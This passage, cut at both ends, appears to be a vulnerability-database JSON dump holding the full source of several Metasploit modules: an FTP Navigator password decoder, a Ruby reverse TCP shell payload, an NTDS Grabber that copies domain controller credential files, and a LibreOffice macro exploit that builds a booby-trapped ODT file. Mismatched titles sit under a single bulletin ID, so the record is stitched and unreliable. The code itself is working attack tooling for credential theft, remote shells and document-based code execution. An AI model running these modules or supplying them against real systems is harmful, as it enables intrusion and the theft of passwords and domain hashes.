Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-15T16:48:53", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 36}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "07ca7cb5cc53f93d1f4897761110e9eb", "type": "metasploit", "bulletinFamily": "exploit", "title": "Ruby Command Shell, Reverse TCP", "description": "Connect back and create a command shell via Ruby\n", "published": "2013-01-10T21:25:50", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-23T18:59:06", "history": [], "viewCount": 15, "enchantments": {"score": {"value": 3.6, "vector": "NONE", "modified": "2019-07-23T18:59:06"}, "dependencies": {"references": [{"type": "malwarebytes", "idList": ["MALWAREBYTES:2750AD08D02BADBF3145DBFC1576F73B", "MALWAREBYTES:5B50DA0085972B595AB51E5E76543E3D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:3A2630BDE36D76A2AD8878BA46386B1A", "CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "threatpost", "idList": ["THREATPOST:5049F818B995E5121EDA184A34A957E6", "THREATPOST:CAF9654BF03F5A319CF3852FDB035F16", "THREATPOST:4D0CB2789F9455B6A0A5CD566071D04F"]}, {"type": "thn", "idList": ["THN:E80D3667882928AF3AD93B20AC6FDDE6"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891861", "OPENVAS:1361412562310891860", "OPENVAS:1361412562310113447", "OPENVAS:1361412562310891859", "OPENVAS:1361412562310891858", "OPENVAS:1361412562310891857", "OPENVAS:1361412562310704484"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:B20E65F1468E77DA2CCFC478C1B66497"]}, {"type": "cve", "idList": ["CVE-2019-12327"]}, {"type": "msrc", "idList": ["MSRC:906AC0755E9EC24CAF074F7E4CF693E7"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1858-1:1A45F"]}, {"type": "kitploit", "idList": ["KITPLOIT:6387497839583318095"]}], "modified": "2019-07-23T18:59:06"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/ruby/shell_reverse_tcp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/payload/ruby'\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = 516\n\n include Msf::Payload::Single\n include Msf::Payload::Ruby\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Ruby Command Shell, Reverse TCP',\n 'Description' => 'Connect back and create a command shell via Ruby',\n 'Author' => [ 'kris katterjohn', 'hdm' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'ruby',\n 'Arch' => ARCH_RUBY,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Session' => Msf::Sessions::CommandShell,\n 'PayloadType' => 'ruby',\n 'Payload' => { 'Offsets' => {}, 'Payload' => '' }\n ))\n end\n\n def generate\n return prepends(ruby_string)\n end\n\n def ruby_string\n lhost = datastore['LHOST']\n lhost = \"[#{lhost}]\" if Rex::Socket.is_ipv6?(lhost)\n \"require 'socket';c=TCPSocket.new(\\\"#{lhost}\\\", #{datastore['LPORT'].to_i});\" +\n \"$stdin.reopen(c);$stdout.reopen(c);$stderr.reopen(c);$stdin.each_line{|l|l=l.strip;next if l.length==0;\" +\n \"(IO.popen(l,\\\"rb\\\"){|fd| fd.each_line {|o| c.puts(o.strip) }}) rescue nil }\"\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-23T18:59:06", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 37}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "cea99839da918f871ed4b868024dff89", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-23T21:03:40", "history": [], "viewCount": 15, "enchantments": {"score": {"value": 4.3, "vector": "NONE", "modified": "2019-07-23T21:03:40"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:1417815329923285271"]}, {"type": "threatpost", "idList": ["THREATPOST:B8011147558BC4D21A6F33CF56BD357F", "THREATPOST:5049F818B995E5121EDA184A34A957E6", "THREATPOST:CAF9654BF03F5A319CF3852FDB035F16", "THREATPOST:4D0CB2789F9455B6A0A5CD566071D04F"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2750AD08D02BADBF3145DBFC1576F73B", "MALWAREBYTES:5B50DA0085972B595AB51E5E76543E3D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:3A2630BDE36D76A2AD8878BA46386B1A", "CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "thn", "idList": ["THN:E80D3667882928AF3AD93B20AC6FDDE6"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891861", "OPENVAS:1361412562310891860", "OPENVAS:1361412562310891859", "OPENVAS:1361412562310113447", "OPENVAS:1361412562310891857", "OPENVAS:1361412562310891858", "OPENVAS:1361412562310704484"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:B20E65F1468E77DA2CCFC478C1B66497"]}, {"type": "cve", "idList": ["CVE-2019-12327"]}, {"type": "msrc", "idList": ["MSRC:906AC0755E9EC24CAF074F7E4CF693E7"]}], "modified": "2019-07-23T21:03:40"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-23T21:03:40", "differentElements": ["description", "modified", "published", "sourceData", "sourceHref", "title"], "edition": 38}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "1d2037ea987a51ad5784397d18a8e3ec", "type": "metasploit", "bulletinFamily": "exploit", "title": "NTDS Grabber", "description": "This module uses a powershell script to obtain a copy of the ntds,dit SAM and SYSTEM files on a domain controller. It compresses all these files in a cabinet file called All.cab.\n", "published": "2017-02-24T09:15:13", "modified": "2018-06-26T13:22:11", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-25T21:08:43", "history": [], "viewCount": 15, "enchantments": {"score": {"value": 2.6, "vector": "NONE", "modified": "2019-07-25T21:08:43"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:343DCFA64E21237453A748C4CF32B11C", "THREATPOST:3092D53040AFF10E9779D8F3F141E3F9"]}, {"type": "krebs", "idList": ["KREBS:2E16A263EA68B68D4B0D84B775A370B9"]}, {"type": "mssecure", "idList": ["MSSECURE:65BA5943AF5B265D6234F4DC532647BB"]}, {"type": "thn", "idList": ["THN:23EB5FC98946BBE294A175928ED613CB", "THN:66694DD5D9C12B2B7881AB6C960E34DC"]}, {"type": "kitploit", "idList": ["KITPLOIT:5805924456997931736", "KITPLOIT:1521717899068290187"]}, {"type": "talosblog", "idList": ["TALOSBLOG:2E2328A9F1FA7E94223C100F344C899E"]}, {"type": "myhack58", "idList": ["MYHACK58:62201995219", "MYHACK58:62201995225"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704487", "OPENVAS:1361412562310891863"]}, {"type": "pentestit", "idList": ["PENTESTIT:3699C81C5F2D75668446A68245CA8BA5"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:89070BA9467D02F1834CE0214BB8B605"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:702E75C31D82FAFC50C4FA71EBD90237"]}, {"type": "cve", "idList": ["CVE-2019-3622", "CVE-2019-3591"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:AF2AAA49E9DD7BE427896C13739AB1F5"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:353CB4603C296A43DDDDDAE6CAC6BE25"]}], "modified": "2019-07-25T21:08:43"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/ntds_grabber.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Powershell\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Registry\n include Msf::Post::File\n include Msf::Post::Common\n\n def initialize(info = {})\n super(update_info(\n info,\n 'Name' => 'NTDS Grabber',\n 'Description' => %q(This module uses a powershell script to obtain a copy of the ntds,dit SAM and SYSTEM files on a domain controller.\n It compresses all these files in a cabinet file called All.cab.),\n 'License' => MSF_LICENSE,\n 'Author' => ['Koen Riepe (koen.riepe@fox-it.com)'],\n 'References' => [''],\n 'Platform' => [ 'win' ],\n 'Arch' => [ 'x86', 'x64' ],\n 'SessionTypes' => [ 'meterpreter' ]\n )\n )\n\n register_options(\n [\n OptBool.new('DOWNLOAD', [ true, 'Immediately download the All.cab file', true ]),\n OptBool.new('CLEANUP', [ true, 'Remove the All.cab file at the end of module execution', true ])\n ],\n self.class\n )\n end\n\n def dc_check\n is_dc_srv = false\n serviceskey = \"HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\"\n if registry_enumkeys(serviceskey).include?(\"NTDS\")\n if registry_enumkeys(\"#{serviceskey}\\\\NTDS\").include?(\"Parameters\")\n is_dc_srv = true\n end\n end\n return is_dc_srv\n end\n\n def task_running(task)\n session.shell_write(\"tasklist \\n\")\n tasklist = session.shell_read(-1, 10).split(\"\\n\")\n tasklist.each do |prog|\n if prog.include? task\n session.shell_close\n return true\n end\n end\n return false\n end\n\n def check_32_on_64\n apicall = session.railgun.kernel32.IsWow64Process(-1, 4)[\"Wow64Process\"]\n # railgun returns '\\x00\\x00\\x00\\x00' if the meterpreter process is 64bits.\n if apicall == \"\\x00\\x00\\x00\\x00\"\n migrate = false\n else\n migrate = true\n end\n return migrate\n end\n\n def get_windows_loc\n apicall = session.railgun.kernel32.GetEnvironmentVariableA(\"Windir\", 255, 255)[\"lpBuffer\"]\n windir = apicall.split(\":\")[0]\n return windir\n end\n\n def run\n downloadflag = datastore['DOWNLOAD']\n cleanupflag = datastore['CLEANUP']\n\n if is_system?\n print_good('Running as SYSTEM')\n else\n print_error('Not running as SYSTEM, you need to be system to run this module! STOPPING')\n return\n end\n\n if not dc_check\n print_error('Not running on a domain controller, you need run this module on a domain controller! STOPPING')\n return\n else\n print_good('Running on a domain controller')\n end\n\n if have_powershell?\n print_good('PowerShell is installed.')\n else\n print_error('PowerShell is not installed! STOPPING')\n return\n end\n\n if check_32_on_64\n print_error('The meterpreter is not the same architecture as the OS! Migrating to process matching architecture!')\n windir = get_windows_loc\n newproc = \"#{windir}:\\\\windows\\\\sysnative\\\\svchost.exe\"\n if exist?(newproc)\n print_status(\"Starting new x64 process #{newproc}\")\n pid = session.sys.process.execute(newproc, nil, { 'Hidden' => true, 'Suspended' => true }).pid\n print_good(\"Got pid #{pid}\")\n print_status('Migrating..')\n session.core.migrate(pid)\n if pid == session.sys.process.getpid\n print_good('Success!')\n else\n print_error('Migration failed!')\n end\n end\n else\n print_good('The meterpreter is the same architecture as the OS!')\n end\n\n base_script = File.read(File.join(Msf::Config.data_directory, \"post\", \"powershell\", \"NTDSgrab.ps1\"))\n execute_script(base_script)\n print_status('Powershell Script executed')\n cabcount = 0\n\n while cabcount < 2\n if task_running(\"makecab.exe\")\n cabcount += 1\n while cabcount < 2\n print_status('Creating All.cab')\n if not task_running(\"makecab.exe\")\n cabcount += 1\n while not file_exist?(\"All.cab\")\n sleep(1)\n print_status('Waiting for All.cab')\n end\n print_good('All.cab should be created in the current working directory')\n end\n sleep(1)\n end\n end\n sleep(1)\n end\n\n if downloadflag\n print_status('Downloading All.cab')\n p1 = store_loot('Cabinet File', 'application/cab', session, read_file(\"All.cab\"), 'All.cab', 'Cabinet file containing SAM, SYSTEM and NTDS.dit')\n print_good(\"All.cab saved in: #{p1}\")\n end\n\n if cleanupflag\n print_status('Removing All.cab')\n begin\n file_rm('All.cab')\n rescue\n print_error('Problem with removing All.cab. Manually check if it\\'s still there.')\n end\n if not file_exist?(\"All.cab\")\n print_good('All.cab Removed')\n else\n print_error('All.cab was not removed')\n end\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-25T21:08:43", "differentElements": ["description", "modified", "published", "sourceData", "sourceHref", "title"], "edition": 39}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "cea99839da918f871ed4b868024dff89", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-25T23:05:33", "history": [], "viewCount": 17, "enchantments": {"score": {"value": 2.9, "vector": "NONE", "modified": "2019-07-25T23:05:33"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:4556506042661879310", "KITPLOIT:5805924456997931736", "KITPLOIT:1521717899068290187"]}, {"type": "threatpost", "idList": ["THREATPOST:343DCFA64E21237453A748C4CF32B11C", "THREATPOST:3092D53040AFF10E9779D8F3F141E3F9"]}, {"type": "krebs", "idList": ["KREBS:2E16A263EA68B68D4B0D84B775A370B9"]}, {"type": "mssecure", "idList": ["MSSECURE:65BA5943AF5B265D6234F4DC532647BB"]}, {"type": "thn", "idList": ["THN:23EB5FC98946BBE294A175928ED613CB", "THN:66694DD5D9C12B2B7881AB6C960E34DC"]}, {"type": "talosblog", "idList": ["TALOSBLOG:2E2328A9F1FA7E94223C100F344C899E"]}, {"type": "myhack58", "idList": ["MYHACK58:62201995219", "MYHACK58:62201995225"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704487"]}, {"type": "pentestit", "idList": ["PENTESTIT:3699C81C5F2D75668446A68245CA8BA5"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:89070BA9467D02F1834CE0214BB8B605"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:702E75C31D82FAFC50C4FA71EBD90237"]}, {"type": "cve", "idList": ["CVE-2019-3622", "CVE-2019-3591"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:AF2AAA49E9DD7BE427896C13739AB1F5"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:353CB4603C296A43DDDDDAE6CAC6BE25"]}], "modified": "2019-07-25T23:05:33"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-25T23:05:33", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 40}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "a3cec41e3764af24d21613e5b8b5a549", "type": "metasploit", "bulletinFamily": "exploit", "title": "LibreOffice Macro Python Code Execution", "description": "LibreOffice comes bundled with sample macros written in Python and allows the ability to bind program events to them. LibreLogo is a macro that allows a program event to execute text as Python code, allowing RCE. This module generates an ODT file with a dom loaded event that, when triggered, will execute arbitrary python code and the metasploit payload.\n", "published": "2019-07-30T21:07:20", "modified": "2019-08-19T18:12:54", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9851", "https://www.libreoffice.org/about-us/security/advisories/cve-2019-9848/", "https://www.libreoffice.org/about-us/security/advisories/cve-2019-9851/", "https://insinuator.net/2019/07/libreoffice-a-python-interpreter-code-execution-vulnerability-cve-2019-9848/"], "cvelist": ["CVE-2019-9848", "CVE-2019-9851"], "lastseen": "2019-08-21T04:07:33", "history": [], "viewCount": 20, "enchantments": {"score": {"value": 7.7, "vector": "NONE", "modified": "2019-08-21T04:07:33"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-9851", "CVE-2019-9848"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/FILEFORMAT/LIBREOFFICE_LOGO_EXEC"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4501-1:7A4C9", "DEBIAN:DSA-4483-1:E4657"]}, {"type": "thn", "idList": ["THN:878061A73E138AD892EFFB4D6E6F0C11", "THN:5BC8F1A67A1CCC7511A6D85B8051C8F3"]}, {"type": "exploitdb", "idList": ["EDB-ID:47298"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310815422", "OPENVAS:1361412562310876592", "OPENVAS:1361412562310815423", "OPENVAS:1361412562310704483", "OPENVAS:1361412562310844097"]}, {"type": "ubuntu", "idList": ["USN-4063-1", "USN-4102-1"]}, {"type": "gentoo", "idList": ["GLSA-201908-13"]}], "modified": "2019-08-21T04:07:33"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/fileformat/libreoffice_logo_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::FILEFORMAT\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'LibreOffice Macro Python Code Execution',\n 'Description' => %q{\n LibreOffice comes bundled with sample macros written in Python and\n allows the ability to bind program events to them.\n\n LibreLogo is a macro that allows a program event to execute text as Python code, allowing RCE.\n\n This module generates an ODT file with a dom loaded event that,\n when triggered, will execute arbitrary python code and the metasploit payload.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Nils Emmerich', # Vulnerability discovery and PoC\n 'Shelby Pace', # Base module author (CVE-2018-16858), module reviewer and platform-independent code\n 'LoadLow', # This msf module\n 'Gabriel Masei' # Global events vuln. disclosure\n ],\n 'References' =>\n [\n [ 'CVE', '2019-9851' ],\n [ 'URL', 'https://www.libreoffice.org/about-us/security/advisories/cve-2019-9848/' ],\n [ 'URL', 'https://www.libreoffice.org/about-us/security/advisories/cve-2019-9851/' ],\n [ 'URL', 'https://insinuator.net/2019/07/libreoffice-a-python-interpreter-code-execution-vulnerability-cve-2019-9848/' ]\n ],\n 'DisclosureDate' => '2019-07-16',\n 'Platform' => 'python',\n 'Arch' => ARCH_PYTHON,\n 'DefaultOptions' => { 'Payload' => 'python/meterpreter/reverse_tcp' },\n 'Targets' => [ ['Automatic', {}] ],\n 'DefaultTarget' => 0\n ))\n\n register_options(\n [\n OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt']),\n OptString.new('TEXT_CONTENT', [true, 'Text written in the document. It will be html encoded.', 'My Report']),\n ])\n end\n\n def gen_file\n text_content = Rex::Text.html_encode(datastore['TEXT_CONTENT'])\n py_code = Rex::Text.encode_base64(payload.encoded)\n @cmd = \"exec(eval(str(__import__('base64').b64decode('#{py_code}'))))\"\n @cmd = Rex::Text.html_encode(@cmd)\n\n fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-9848', 'librefile.erb'))\n libre_file = ERB.new(fodt_file).result(binding())\n\n print_status(\"File generated! Now you need to move the odt file and find a way to send it/open it with LibreOffice on the target.\")\n\n libre_file\n rescue Errno::ENOENT\n fail_with(Failure::NotFound, 'Cannot find template file')\n end\n\n def exploit\n fodt_file = gen_file\n\n file_create(fodt_file)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-21T04:07:33", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 41}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "cea99839da918f871ed4b868024dff89", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-21T12:01:03", "history": [], "viewCount": 21, "enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2019-08-21T12:01:03"}, "dependencies": {"references": [{"type": "carbonblack", "idList": ["CARBONBLACK:68931406CAF1EF8481ACDB4D6D8D4F12"]}, {"type": "exploitdb", "idList": ["EDB-ID:47298"]}, {"type": "threatpost", "idList": ["THREATPOST:001124DB1098FD007FB3BF0666DD6ED8", "THREATPOST:1A2B172EEE3B60C2053C8FC73098B359", "THREATPOST:9B176C5C48E174E3921CACCD02D7A4FC", "THREATPOST:AA2B9DFA25A197F91CD3AA186832B3A8"]}, {"type": "cve", "idList": ["CVE-2019-4120", "CVE-2019-4482", "CVE-2019-3753", "CVE-2019-4310", "CVE-2019-12889"]}, {"type": "mssecure", "idList": ["MSSECURE:9B6A456B8BCD0BE60C0401B95993090D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:EBEFBA9A29ACDC6FD30606EC8A9FFEB1"]}, {"type": "mskb", "idList": ["KB4506991", "KB4506988", "KB4495611"]}, {"type": "talos", "idList": ["TALOS-2019-0794", "TALOS-2019-0795", "TALOS-2019-0805"]}, {"type": "ics", "idList": ["ICSA-19-232-01"]}], "modified": "2019-08-21T12:01:03"}}, "objectVersion": "1.4", "sourceHref": 